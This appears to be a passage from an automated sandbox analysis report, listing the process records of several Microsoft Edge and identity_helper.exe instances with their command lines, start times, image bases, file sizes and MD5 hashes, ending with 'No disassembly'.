                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                                                                  Start time:17:32:52
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=2128,i,5363486696268237516,2027687803800706912,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                                                  Start time:17:33:00
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                                  Start time:17:33:01
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2616 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                                  Start time:17:33:01
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3780 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                                  Start time:17:33:01
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=4440 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7408f0000
                                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                                  Start time:17:33:01
                                                                                                                                                                                                                                                                                  Start date:03/01/2025
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=4440 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7408f0000
                                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  No disassembly